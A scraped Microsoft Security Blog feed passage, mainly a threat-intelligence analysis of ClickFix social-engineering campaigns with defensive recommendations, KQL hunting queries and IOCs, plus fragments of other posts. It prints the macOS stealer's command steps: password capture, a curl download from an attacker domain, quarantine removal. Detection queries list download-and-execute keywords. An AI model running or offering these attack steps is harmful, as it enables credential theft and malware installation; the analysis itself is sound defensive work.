• https://www.aikido.dev/blog/shai-hulud-strikes-again-hitting-zapier-ensdomains

Learn more  

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Shai-Hulud 2.0: Guidance for detecting, investigating, and defending against the supply chain attack appeared first on Microsoft Security Blog.

Over the past year, Microsoft Threat Intelligence and Microsoft Defender Experts have observed the ClickFix social engineering technique growing in popularity, with campaigns targeting thousands of enterprise and end-user devices globally every day. Since early 2024, we’ve helped multiple customers across various industries address such campaigns attempting to deliver payloads like the prolific Lumma Stealer malware. These payloads affect Windows and macOS devices and typically lead to information theft and data exfiltration.

The ClickFix technique attempts to trick users into running malicious commands on their devices by taking advantage of their target’s tendency to solve minor technical issues and other seemingly benign interactions, such as human verification and CAPTCHA checks. It typically gives the users instructions that involve clicking prompts and copying, pasting, and running commands directly in the Windows Run dialog box, Windows Terminal, or Windows PowerShell. It’s often combined with delivery vectors such as phishing, malvertising, and drive-by compromises, most of which even impersonate legitimate brands and organizations to further reduce suspicion from their targets.

Because ClickFix relies on human intervention to launch the malicious commands, a campaign that uses this technique could get past conventional and automated security solutions. Organizations could thus reduce the impact of this technique by educating users in recognizing its lures and by implementing policies that will harden the device configurations in their environment (for example, disallowing users to use the Run dialog if it’s not necessary in their daily tasks). Microsoft Defender XDR also provides a comprehensive set of protection features that detect this threat at various stages of the attack chain.

This blog discusses the different elements that make up a ClickFix campaign—from the arrival vectors it comes with to its various implementations—and provides different examples of threat campaigns we’ve observed to further illustrate these elements. We also provide recommendations and detection details to surface and mitigate this threat.

• The ClickFix attack chain
• Before the click: Arrival vectors
• Inside the click: ClickFix implementations
• The “fix”: User-level code execution
• Beyond Windows: ClickFix targeting macOS users
• Behind the click: ClickFix kits and other services for sale
• ClickFix protection and detection

The ClickFix attack chain

A typical ClickFix attack begins with threat actors using phishing emails, malvertisements, or compromised websites to lead unsuspecting users to a visual lure—usually a landing page—and trick them into executing a malicious command themselves. By adding this user interaction element in the attack chain, a threat using the ClickFix technique could slip through conventional and automated security solutions.

Microsoft Threat Intelligence observed threat actors adapting and improving certain elements of the technique to further evade detection. For example, threat actors obfuscate the JavaScript that generates the visual lures or they download parts of the code from different servers. They also employ various tactics in obfuscating malicious commands. We discuss these stages of the attack chain in detail in the succeeding sections of this blog.

Once the malicious command is run by the user, malware is downloaded into the target device. We’ve observed numerous threat actors that leverage ClickFix attacks deliver the following:

• Infostealers like LummaStealer, which appears to be the most prolific ClickFix final payload based on our observations and threat hunting investigations  
• Remote access tools (RATs) such as Xworm, AsyncRAT, NetSupport, and SectopRAT, which could allow threat actors to conduct hands-on keyboard activity like discovery, lateral movement, and persistence
• Loaders like Latrodectus and MintsLoader, which could deliver additional malware and other payloads
• Rootkits, such as a modified version of the open source r77, which could allow threat actors to employ several sophisticated persistence and defense evasion tactics and remain deeply embedded in a victim system

These final payloads are often “fileless”, that is, they’re seldom written to disk as a Windows executable (.exe or .dll) file. Instead, they’re loaded and launched in memory by living-off-the-land binaries (LOLBins), often as a .NET assembly or Common Language Runtime (CLR) module. However, whether the malware is on disk or in memory, we’ve observed its code injected into LOLBins, such as msbuild.exe, regasm.exe, or powershell.exe.

Case study: Lampion malware campaign

To illustrate a typical ClickFix attack chain, let’s look at a campaign we first identified in May 2025 targeting Portuguese organizations in government, finance, and transportation sectors to deliver Lampion malware, an infostealer focused on banking information. This campaign has since been observed in other countries—including Portugal, Switzerland, Luxembourg, France, Hungary, and Mexico—targeting organizations in the government, education, transportation, and financial services industries. As of June 2025, this campaign remains active.

The Lampion malware campaign’s ClickFix lures, obfuscation methods, and multi-stage infection process are designed to evade detection:

1. The threat actor sends phishing emails containing a ZIP file, which when opened, contains an HTML file that redirects target users to a fake Portuguese tax authority site where the ClickFix lure is hosted.
2. The ClickFix lure tricks users into launching a PowerShell command that downloads an obfuscated VBScript (.vbs).
3. The downloaded script then writes a second obfuscated .vbs file to the Windows %TEMP% directory and schedules it to run later using a hidden task.
4. This second .vbs file downloads a third and much larger .vbs file that performs reconnaissance, checks for antivirus or sandbox environments, and sends system data to a command-and-control (C2) server.
5. The third script also creates a .cmd file in the Windows startup folder, naming it after the user’s hostname, and schedules a system restart.
6. After the device restarts, the .cmd file launches a large DLL through rundll32.exe and attempts to deliver the final payload.

However, during our investigation, the actual Lampion malware wasn’t delivered because the download command was commented out of the code.

Before the click: Arrival vectors

Threat actors leveraging ClickFix rely on a variety of methods to lure unwitting users. We’ve observed three primary avenues where a user could encounter a ClickFix prompt: by receiving phishing emails, encountering a malicious ad, or by visiting a compromised or malicious website.

Phishing

Microsoft Threat Intelligence first observed the use of the ClickFix technique between March and June 2024 in email campaigns sent by a threat actor we track as Storm-1607. These emails contained HTML attachments that attempted to install DarkGate, a commodity loader that is capable of keylogging, cryptocurrency mining, establishing C2 communications, and downloading additional malicious payloads, among others.

One of Storm-1607’s campaigns observed in May 2024 consisted of tens of thousands of emails targeting organizations in the United States (US) and Canada. These emails used payment and invoice lures and contained attachments with file names like reports_528647.html:

When opened, the HTML loaded a page with a fake Microsoft Word new document image and a dialog box showing an error message and prompting the user to click the How to fix button:

Clicking the button copied the malicious code on the user’s clipboard in the background. Meanwhile, the dialog box added new instructions that explained to the user how to open Windows Terminal and paste the malicious code into it:

While other threat actors also use invoice or payment lures in their phishing campaigns, as of this writing, including HTML attachments in the emails is no longer the preferred method to implement the ClickFix technique. Instead, threat actors now include in their phishing email a URL that points to a ClickFix landing page. For example, in March 2025, we observed a threat actor tracked as Storm-0426 launch a campaign consisting of thousands of phishing emails that targeted users in Germany and attempted to install MintsLoader. The emails used payment and invoice lures purportedly from a web hosting provider and contained URLs leading to the Prometheus traffic direction system (TDS) hosted on numerous compromised sites:

The TDS redirected users to the attacker-controlled website mein-lonos-cloude[.]de, where the ClickFix technique instructed the users to complete a human verification process by following the displayed instructions, which launched a malicious code:

Another example of a phishing campaign using URLs and redirectors was observed in June 2025, where the campaign impersonated the US Social Security Administration (SSA) and used a combination of social engineering and domain spoofing to deliver ScreenConnect, a legitimate remote management tool that has become increasingly abused by threat actors. Once installed, ScreenConnect could give an attacker full remote control over a victim’s system, enabling them to exfiltrate data, install additional malware, or conduct surveillance.

The campaign began with emails sent from a legitimate but compromised Brazilian domain. The message, which even included legitimate links to SSA’s official social media accounts in the footer, claimed that there was an issue with the recipient’s social security statement. Like other phishing emails, these characteristics and tactics were all attempts by the threat actor to bypass spam filters, lend credibility and reduce suspicion to the message, and prompt the user to take immediate action:

The message’s call-to-action button, labeled Download Statement, was also particularly deceptive because instead of linking directly to a malicious site, it used a Google Ads URL redirect to obfuscate the final destination. This technique not only helped the email pass through conventional email security solutions, it also undermined an email best practice (hovering over the links before clicking to determine if the URL displayed points to the intended site or not) users are typically taught as part of their security awareness trainings.

When a user clicked the Download Statement button, they were redirected to a spoofed SSA website hosted on a Spanish top-level domain (access-ssa-gov[.]es). The site closely mimicked the real SSA home page, including a blurred background image of the legitimate site to create a false sense of familiarity and trust:

The landing page presented the user with a CAPTCHA human verification pop-up, which was part of the ClickFix technique. Behind the scenes, this interaction triggered a series of fake verification steps designed to guide the user into running a PowerShell script that would eventually download and launch the ScreenConnect payload:

Malvertising

Malvertising is another popular delivery method that leads to ClickFix landing pages. In a campaign observed in April 2025, users who attempted to stream free or pirated movies on certain websites inadvertently launched a variety of scam pages in a new browser tab when they interacted with a movie (for example, by pressing the play button):

One of these scam pages was a ClickFix landing page that downloaded and installed Lumma Stealer:

This activity cluster is notable because it renamed the various intermediate HTA scripts to media format extensions such as .mp3, .mp4, or .ogg. It’s also notable for its high traffic volumes: in a single day, tens of thousands, if not hundreds of thousands, of unique visitors could be funneled to scam pages (including the ClickFix landing page) through the malvertising redirectors.

Drive-by compromise

Some threat actors have also been observed to leverage compromised websites to deliver the ClickFix landing page. For example, the threat actor we track as Storm-0249 has traditionally used email to deliver Latrodectus or other initial access malware—whether by using PDF files or URL links (sometimes copyright infringement-themed). However, since the beginning of March 2025, Storm-0249 switched to compromising legitimate websites, potentially through WordPress vulnerabilities, and using the ClickFix technique to deliver its payloads.

When a user visits the compromised site, the original page is briefly displayed before it’s replaced with the ClickFix human verification lure. This specific lure even spoofs Cloudflare to further trick users into thinking that the verification step is legitimate:

Inside the click: ClickFix implementations

ClickFix operators use several methods to attempt to convince a target to perform user-level command execution on their system. Early landing pages mimicked Google’s “Aw, Snap!” crash error or Word Online extension missing message (as depicted in Figure 4), while recent ones spoof Google’s reCAPTCHA and Cloudflare’s Turnstile solution. We’ve even observed threat actors spoof social media platforms like Discord to trick users into believing they’re joining an actual Discord server. Many elements go into building ClickFix lure pages—from JavaScript inline frames (iframes) and HTML href codes to cascading style sheets (CSS) resources—to make them more legitimate-looking.

There are various ways that ClickFix is implemented: some implementations are contained in one file or page, while others use remote resources. Some threat actors leave code comments amateurishly while others obfuscate their code. There are even implementations that report the status of an infection to a Telegram channel or a web server. We provide a few examples of these implementations and discuss their inner workings.

Impersonating Cloudflare Turnstile

Figure 14 shows a partial screenshot of a ClickFix landing page, binancepizza[.]info, displaying a seemingly legitimate Cloudflare Turnstile verification process that a user is lured to interact with before they can supposedly access the site:

Its HTML source code clones this Cloudflare Turnstile style page using a href attribute to a CSS resource hosted by the Font Awesome library:

The page also references an HTML file (field.html) using a hidden iframe:

Within field.html, we see in Figure 17 that contentElis the iframe element representing the fake Cloudflare Turnstile verification check box. When a user ticks the Verify you are human check box, this script animates a fake spinner through runVerification()and sends postMessage(“trigger”) to the parent window (the main landing page).

The user is then presented with the ClickFix instructions (Figure 18), while the obfuscated command is copied to the user’s clipboard (Figure 19):

Figure 20 shows that the clipboard copy occurs once the code receives the message “trigger”, which is sent by the field.html hidden iframe. Once that message is received, the script uses navigator.clipboard.writeText(codeToCopy) to copy the command to the clipboard.

Impersonating social platforms

It’s important to note that not all ClickFix landing pages are designed in the same manner and might not strictly contain the elements discussed previously. In some instances, threat actors also mimic popular social platforms to broaden their reach of potential targets.

Figure 21 shows a ClickFix landing page spoofing a Discord server supposedly needing to verify a user before they can join:

In this page’s source code (Figure 22), we can see it referencing the Discord logo image file to appear legitimate. Additionally, theaddEventListener method waits for the Verify button to get clicked (through verifyBtn) so navgiator.clipboard.writetext(command) can copy the malicious command to the user’s clipboard. This JavaScript method is a Clipboard API that allows for accessing the operating system (OS) clipboard. Older pages might use document.execCommand(), which is now deprecated.

The fake Discord landing page differs from the previous example because the reference of an external trigger (from the hidden iframe) isn’t used here. Instead, the click then copy is all processed from the main window. Based on our analysis, this landing page also appears to be part of the OBSCURE#BAT campaign delivering r77 rootkit.

The “fix”: User-level code execution

The ClickFix technique typically presents its “fix” by instructing users to run malicious commands or code in the Windows Run dialog box. We assess that the threat actors who use this technique are banking on the idea that most of their targets aren’t familiar with this Windows OS component and what it’s used for, unlike the more advanced users doing system administrator tasks. Early ClickFix lures instructed users to run commands manually and directly in Windows Terminal or Windows PowerShell. However, multiple line warnings might have deterred potential victims from running these commands, leading to the threat actors changing their tactics.

Detecting Windows Run dialog misuse

The Windows Run dialog (Win + R) is a trusted shell input user interface (UI) that’s part of Windows Explorer (explorer.exe). Internally, it uses ShellExecute or CreateProcess APIs to resolve and launch commands. The input is limited to MAX_PATH, requiring a null-terminated string (\0) with a practical maximum of 259 characters. Additionally, as part of the Run dialog, Windows loads tiptsf.dll module in explorer.exe. This DLL file is related to the Text Services Framework (TSF), which provides input processor interface.

Entering commands into the Run dialog leaves forensic traces—most notably in the RunMRU(Most Recently Used) registry key. This key keeps a history of Run dialog executions and can be used to reconstruct user-initiated activity during investigations. Note that it doesn’t create a registry entry if the process execution fails.

To determine if a ClickFix command execution is potentially occurring in the environment, one can check the RunMRU entries if they include signs pointing to LOLBins—such as powershell, mshta, rundll32, wscript, curl, and wget—that can execute code and/or download payloads. PowerShell continues to be the most leveraged native binary, with cmdlets such as iwr (Invoke-WebRequest), irm (Invoke-RestMethod), and iex (Invoke-Expression) being very prolific.

 Additional suspicious elements to check in entries within the RunRMU registry key include the following:

• First-stage payloads are often hosted by direct IP addresses, content delivery network (CDN) domains, interesting top-level domains (for example, .live,. shop, .icu), or code-sharing platforms such as pastes.
• First-stage payloads are often delivered and/or launched as specific file type such as .html, .hta, .txt, .zip, .msi, .bat, .ps1, or .vbs
  • The file type of the scripts might be renamed to media extensions (such as .png, .mp3, .mp4, .wav, and .jpg) to hide their true intent.
  • The file type might employ double file extension for evasion (for example, file.hta.mp4)
• URLs are often shortened using shorteners such as Bitly.
• A fake reCAPTCHA, CAPTCHA, or Turnstile confirmation is included, such as the following:
  • ✅ “I am not a robot – reCAPTCHA Verification ID: XXXX”
  • # # I am not a robot: CAPTCHA Verification UID: XXXX\
  • # “Human, not a robot: CAPTCHA: Verification ID: XXXX”
  • ✔️ “Cloud identificator:XXXX”

Obfuscation and execution techniques for defense evasion

The command examples in the previous section aren’t all encompassing, as we’ve observed threat actors employing a growing number of obfuscation and execution techniques for defense evasion. These techniques include nested execution chains, proxy command abuse, encoding schemes such as Base64, use of string concatenation/fragmentation, and escaped characters, among others.

Beyond Windows: ClickFix targeting macOS users

In June 2025, a ClickFix campaign was reported to be targeting macOS users to deliver Atomic macOS Stealer (AMOS). This new campaign is yet another mark in the continuously evolving threat landscape, as the ClickFix technique was previously observed to be more common in Windows-based attacks.

The campaign, which according to our analysis goes back to late May 2025, redirected target users to Clickfix-themed delivery websites that were impersonating Spectrum, a US-based company that provides services for cable television, internet access, and unified communications:

Like any other ClickFix campaign, when the user clicks the Alternate verification button, the page displays instructions the user has to follow to “fix” their issue. Interestingly, the steps the lure displays even on macOS users are for Windows devices:

Meanwhile, in the background, a malicious command is copied to the user’s clipboard. The command that is copied is different for macOS and Windows devices.

Windows:

macOS:

The command that’s copied for macOS devices instructs the system to perform the following actions:

1. Get current user: username=$(whoami)
2. Prompt for the correct password: Continuously prompt System Password: until the user enters the correct password
3. Validate password: Use dscl . -authonly to verify the password against macOS directory services
4. Store password: Save the valid password to the /tmp/.pass file
5. Download payload: curl -o /tmp/update hxxps[:]//applemacios[.]com/getrur/update
6. Remove quarantine: Use the stolen password with sudo -S xattr -c to bypass macOS security
7. Make an executable file: chmod +x /tmp/update
8. Launch the malware: Run the downloaded file /tmp/update

The file saved as update within the tmp directory belongs to the AMOS malware family. AMOS variants such as Poseidon and Odyssey are known to steal user information, including browser cookies, passwords, and cryptocurrency wallet credentials.

Behind the click: ClickFix kits and other services for sale

Microsoft Threat Intelligence has observed several threat actors selling the ClickFix builders (also called “Win + R”) on popular hacker forums since late 2024. Some of these actors are bundling ClickFix builders into their existing kits that already generate various files such as LNK, JavaScript, and SVG files. The kits offer creation of landing pages with a variety of available lures including Cloudflare. They also offer construction of malicious commands that users will paste into the Windows Run dialog. These kits claim to guarantee antivirus and web protection bypass (some even promise that they can bypass Microsoft Defender SmartScreen), as well as payload persistence. The cost of subscription to such a service might be between US$200 to US$1,500 per month. We’ve also discovered sellers that offer one-time and piece-meal solutions (for example, only the source code, landing page, or the command line) priced anywhere between US$200 and US$500.

Figures 34 and 35 show an example of a ClickFix builder that offers a variety of configurable options such as:

• Displaying a decoy PDF file after a target user is phished
• Payload execution timing
• Virtual machine (VM) detection and evasion (“Anti VM”) and user access control (UAC) bypass
• Visual template to be used, such as Google Meet, Google CAPTCHA, or Cloudflare
• Language to be used, for example, English, German, Spanish, French, Italian, or Portuguese

ClickFix protection and detection

Microsoft Defender XDR offers comprehensive coverage for ClickFix attacks by leveraging a range of available technologies across different attack layers. For example, Microsoft Defender SmartScreen displays a warning to Microsoft Edge users when they visit a ClickFix landing page:

Even if a user chooses to bypass the SmartScreen warning or is using a different web browser and is socially engineered to execute a command in the Run dialog, Microsoft Defender for Endpoint detects and mitigates the attacks initial access activities like the suspicious process execution and command-line activity during the process scan phase.

Most attack paths eventually lead to the execution of either PowerShell or HTA scripts. Microsoft’s Antimalware Scan Interface (AMSI) provides scanning capabilities for both scripting environments and PowerShell applications. Defender’s Cloud Protection delivers enhanced protection by monitoring and intercepting outgoing connections to malicious URLs as well as analyzing process execution patterns. Additionally, Microsoft Defender for Office 365 analyzes end-to-end links and HTML attachments, and has fake CAPTCHA behavioral signatures that proactively block ClickFix-related phishing emails.

Additional attack chain coverage with network protection

In early 2025, Microsoft Defender Experts observed thousands of devices being affected by a ClickFix attack (that is, the ClickFix command was executed by a user on the device) per month, even with an endpoint detection and response (EDR) solution enabled. Due to this, our researchers performed pattern-of-life analysis to follow the tactics, techniques, and procedures (TTPs) in the attack timeline and understand the gaps that can be filled so that the attack could be stopped at the initial access stage. Their research resulted in the automation of the analysis and collection of numerous obfuscated/encoded LOLBin commands observed in the RunMRU registry, and they were able to successfully extract and block newly created malicious domainsthrough Defender for Endpoint’s network protection feature. This feature is an important component on the protection against ClickFix because blocking the C2 domains early in the attack chain prevents the download and/or execution of first-stage payloads, effectively making the attack unsuccessful.

Recommendations

Microsoft Threat Intelligence recommends the following mitigations to reduce the impact of this threat.

• Educate users to identify social engineering attacks.
• Ensure users are aware of what they copy and paste.
• Check your Microsoft 365 email filtering settings to ensure spoofed emails, spam, and emails with malware are blocked. Use Microsoft Defender for Office 365 for enhanced phishing protection and coverage against new threats and polymorphic variants. Configure Defender for Office 365 to recheck links on click and delete sent mail in response to newly acquired threat intelligence. Turn on safe attachments policies to check attachments to inbound email.
• Consider using enterprise-managed browsers, which provide multiple security features including security update requirements and data compliance policies.
• Block web pages from automatically running Flash plugins.
• Enable network protection and web protection in Microsoft Defender for Endpoint to safeguard against malicious sites and internet-based threats.
• Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus, or the equivalent for your antivirus product, to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
• Enable PowerShell script block logging to detect and analyze obfuscated or encoded commands, providing visibility into malicious script execution that might otherwise evade traditional logging.
• Use PowerShell execution policies such as setting AllSigned or RemoteSigned tohelp reduce the risk of malicious execution by ensuring only trusted, signed scripts are executed, adding a layer of control.
• Use Group Policy to deploy hardening configurations throughout your environment, if certain features are not necessary:
  • Disable the Run dialog box (Win + R) key and remove the Run option from the Start Menu by selecting User Configuration > Administrative Templates > Start Menu and Taskbar > Remove Run menu from Start Menu.
  • Create an App Control policy that prohibits the launch of native Windows binaries from Run. This can be accomplished by defining a rule based on the specific process that is launching binaries like PowerShell.
  • Configure Windows Terminal access and settings to warn users when the text they’re pasting contains multiple lines.

Microsoft Defender XDR customers can also implement the following attack surface reduction rules to harden an environment against PowerShell techniques used by threat actors:

• Block execution of potentially obfuscated scripts
• Block executable files from running unless they meet a prevalence, age, or trusted list criterion
• Block JavaScript or VBScript from launching downloaded executable content

Microsoft Defender detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects this threat as the following malware:

• Behavior:Win32/ClickFix
• Behavior:Win32/SuspClickFix
• Trojan:Win32/ClickFix
• Trojan:Script/ClickFix
• Behavior:Win32/RegRunMRU
• Trojan:HTML/FakeCaptcha

Microsoft Defender for Endpoint

The following Microsoft Defender for Endpoint alerts might also indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity:

• Suspicious command in RunMRU registry
• Use of living-off-the-land binary to run malicious code
• Suspicious process executed PowerShell command
• Suspicious PowerShell command line
• Suspicious ‘SuspClickFix’ behavior was blocked
• An active ‘SuspDown’ malware was prevented from executing via AMSI
• Suspicious ‘MaleficAms’ behavior was blocked
• An active ‘ClickFix’ malware in a command line was prevented from executing
• ‘ClickFix’ malware was prevented
• Information stealing malware activity
• Powershell made a suspicious network connection
• Suspicious process launch by Rundll32.exe
• Suspicious Rundll32 command-line
• Suspicious Scheduled Task Process Launched

Microsoft Defender for Office 365

Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:

• A potentially malicious URL click was detected
• Email messages containing malicious URL removed after delivery
• Email messages removed after delivery
• A user clicked through to a potentially malicious URL
• Suspicious email sending patterns detected
• Email reported by user as malware or phish

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

• Check impact of an external threat article
• Suspicious script analysis
• Threat actor profile
• Threat Intelligence 360 report based on MDTI article
• Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

• DarkGate malware samples delivered through fake Notion websites followed by ClickFix technique
• ClickFix and spoofed IT apps deliver RATs via Node.js over Cloudflare Quick Tunnels
• Phishing campaign impersonates Booking.com, delivers multiple commodity malware types
• Storm-1877 evolving tactics to target users with ClickFix attacks
• Email phishing campaign leads to Xworm
• ClickFix technique leverages clipboard to run malicious commands
• Lampion Is Back With ClickFix Lures

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries

Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

ClickFix commands execution

Identify ClickFix commands execution.

DeviceRegistryEvents
| where ActionType =~ "RegistryValueSet"
| where InitiatingProcessFileName =~ "explorer.exe"
| where RegistryKey has @"\CurrentVersion\Explorer\RunMRU"
| where RegistryValueData has "✅"
        or (RegistryValueData has_any ("powershell", "mshta", "curl", "msiexec", "^")
             and RegistryValueData matches regex "[\u0400-\u04FF\u0370-\u03FF\u0590-\u05FF\u0600-\u06FF\u0E00-\u0E7F\u2C80-\u2CFF\u13A0-\u13FF\u0530-\u058F\u10A0-\u10FF\u0900-\u097F]")
        or (RegistryValueData has "mshta" and RegistryValueName !~ "MRUList" and RegistryValueData !in~ ("mshta.exe\\1", "mshta\\1"))
        or (RegistryValueData has_any ("bitsadmin", "forfiles", "ProxyCommand=") and RegistryValueName !~ "MRUList")
        or ((RegistryValueData startswith "cmd" or RegistryValueData startswith "powershell")
            and (RegistryValueData has_any ("-W Hidden ", " -eC ", "curl", "E:jscript", "ssh", "Invoke-Expression", "UtcNow", "Floor", "DownloadString", "DownloadFile", "FromBase64String",  "System.IO.Compression", "System.IO.MemoryStream", "iex", "Invoke-WebRequest", "iwr", "Get-ADDomainController", "InstallProduct", "-w h", "-X POST", "Invoke-RestMethod", "-NoP -W", ".InVOKe", "-useb", "irm ", "^", "[char]", "[scriptblock]", "-UserAgent", "UseBasicParsing", ".Content")
              or RegistryValueData matches regex @"[-/–][Ee^]{1,2}[NnCcOoDdEeMmAa^]*\s[A-Za-z0-9+/=]{15,}"))

Lampion malware activity 

The following query searches for PowerShell command associated with Lampion malware activity that is used to download malicious files.

DeviceProcessEvents 
| where InitiatingProcessFileName == "powershell.exe" 
| where InitiatingProcessParentFileName == "explorer.exe" 
| where FileName has_any ("WScript.exe") 
| where ProcessCommandLine contains "\"PowerShell.exe\" -windowstyle minimized -Command" 
and ProcessCommandLine has "Invoke-WebRequest"

Microsoft Sentinel

Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with ‘TI map’) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace.

Below are the queries using Sentinel Advanced Security Information Model (ASIM) functions to hunt threats across both Microsoft first-party and third-party data sources. ASIM also supports deploying parsers to specific workspaces from GitHub, using an ARM template or manually

Detect network IP and domain indicators of compromise using ASIM

The following query checks IP addresses and domain IOCs across data sources supported by ASIM network session parser:

//IP list and domain list- _Im_NetworkSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["185.234.72.186", "45.94.31.176", "3.138.123.13", "16.171.23.221", "3.23.103.13", "83.242.96.159", "5.8.9.77"]);
let ioc_domains = dynamic(["mein-lonos-cloude.de", "derko-meru.online", "objectstorage.ap-singapore-2.oraclecloud.com", "tesra.shop", "zzzp.live", "cqsf.live", "access-ssa-gov.es", "binancepizza.info", "panel-spectrum.net"]);
_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)
| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated),
  EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor

Detect network and files hashes indicators of compromise using ASIM

The following query checks IP addresses, domains, and file hash IOCs across data sources supported by ASIM web session parser:

//IP list - _Im_WebSession
let lookback = 30d;
let ioc_ip_addr = dynamic(["185.234.72.186", "45.94.31.176", "3.138.123.13", "16.171.23.221", "3.23.103.13", "83.242.96.159", "5.8.9.77"]);
let ioc_sha_hashes =dynamic(["061d378ffed42913d537da177de5321c67178e27e26fca9337e472384d2798c8", "592ef7705b9b91e37653f9d376b5492b08b2e033888ed54a0fd08ab043114718", "8fb329ae6b590c545c242f0bef98191965f7afed42352a0c84ca3ccc63f68629", "d9ffe7d433d715a2bf9a31168656e965b893535ab2e2d9cab81d99f0ce0d10c9", "f77c924244765351609777434e0e51603e7b84c5a13eef7d5ec730823fc5ebab"]);
_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())
| where DstIpAddr in (ioc_ip_addr) or FileSHA256 in (ioc_sha_hashes)
| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated),
  EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor

// Domain list - _Im_WebSession
let ioc_domains = dynamic(["mein-lonos-cloude.de", "derko-meru.online", "objectstorage.ap-singapore-2.oraclecloud.com", "tesra.shop", "zzzp.live", "cqsf.live", "access-ssa-gov.es", "binancepizza.info", "panel-spectrum.net"]);
_Im_WebSession (url_has_any = ioc_domains)

Detect files hashes indicators of compromise using ASIM

The following query checks IP addresses and file hash IOCs across data sources supported by ASIM file event parser:

// file hash list - imFileEvent
let ioc_sha_hashes = dynamic(["061d378ffed42913d537da177de5321c67178e27e26fca9337e472384d2798c8", "592ef7705b9b91e37653f9d376b5492b08b2e033888ed54a0fd08ab043114718", "8fb329ae6b590c545c242f0bef98191965f7afed42352a0c84ca3ccc63f68629", "d9ffe7d433d715a2bf9a31168656e965b893535ab2e2d9cab81d99f0ce0d10c9", "f77c924244765351609777434e0e51603e7b84c5a13eef7d5ec730823fc5ebab"]);
imFileEvent
| where SrcFileSHA256 in (ioc_sha_hashes) or
TargetFileSHA256 in (ioc_sha_hashes)
| extend AccountName = tostring(split(User, @'')[1]), 
  AccountNTDomain = tostring(split(User, @'')[0])
| extend AlgorithmType = "SHA256"

Indicators of compromise

References

• https://www.securonix.com/blog/analyzing-obscurebat-threat-actors-lure-victims-into-executing-malicious-batch-scripts-to-deploy-stealthy-rootkits/
• https://www.cloudsek.com/blog/amos-variant-distributed-via-clickfix-in-spectrum-themed-dynamic-delivery-campaign-by-russian-speaking-hackers

Learn more

To know how Microsoft can help your team stop similar threats and prevent future compromise with human-led managed services, check out Microsoft Defender Experts for XDR.

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Think before you Click(Fix): Analyzing the ClickFix social engineering technique appeared first on Microsoft Security Blog.

Co-authors: Henry Yan, Sr. Product Marketing Manager and Sylvie Liu, Principal Product Manager

Security Operations Centers (SOCs) are under extreme pressure due to a rapidly evolving threat landscape, an increase in volume and frequency of attacks driven by AI, and a widening skills gap. To address these challenges, organizations across industries are relying on Microsoft Defender Experts for XDR and Microsoft Defender Experts for Hunting to bolster their SOC and stay ahead of emerging threats. We are committed to continuously enhancing Microsoft Defender Experts services to help our customers safeguard their organizations and focus on what matters most.

We are excited to announce the general availability of expanded Defender Experts coverage. With this update, Defender Experts for XDR and Defender Experts for Hunting now deliver around the clock protection and proactive threat hunting for your cloud workloads, starting with hybrid and multicloud servers in Microsoft Defender for Cloud. Additionally, third-party network signals from Palo Alto Networks, Zscaler, and Fortinet can now be used for incident enrichment in Defender Experts for XDR, enabling faster and more accurate detection and response.

Extend 24/7, expert-led defense and threat hunting to your hybrid and multicloud servers

As cloud adoption accelerates, the sophistication and frequency of cloud attacks are on the rise. According to IDC, in 2024, organizations experienced an average of more than nine cloud security incidents, with 89% reporting an increase year over year. Furthermore, cloud security is the leading skills gap with almost 40% of respondents in the O’Reilly 2024 State of Security Survey identifying it as the top area in need of skilled professionals. Virtual machines (VMs) are the backbone of cloud infrastructure, used to run critical applications with sensitive data while offering flexibility, efficiency, and scalability. This makes them attractive targets for attackers as compromised VMs can be used to potentially carry out malicious activities such as data exfiltration, lateral movement, and resource exploitation.

